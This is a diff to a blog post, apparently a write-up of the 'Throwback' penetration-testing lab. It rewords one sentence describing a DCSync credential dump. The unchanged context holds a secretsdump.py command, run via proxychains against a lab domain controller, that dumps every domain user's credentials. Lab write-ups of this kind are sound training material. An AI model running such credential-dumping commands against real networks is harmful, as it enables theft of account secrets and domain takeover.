wither/wither.github.io/_posts/2023-01-09-throwback.markdown

 sudo proxychains python3 secretsdump.py -dc-ip 10.200.29.117 THROWBACK/backup@10.200.29.117
 ```

-To dump the credentials of all users on the domain controller.
+To dump the credentials of all users on the domain.

 ![dumped dcsync creds](/assets/img/posts/throwback/68_dcsync_dump.webp)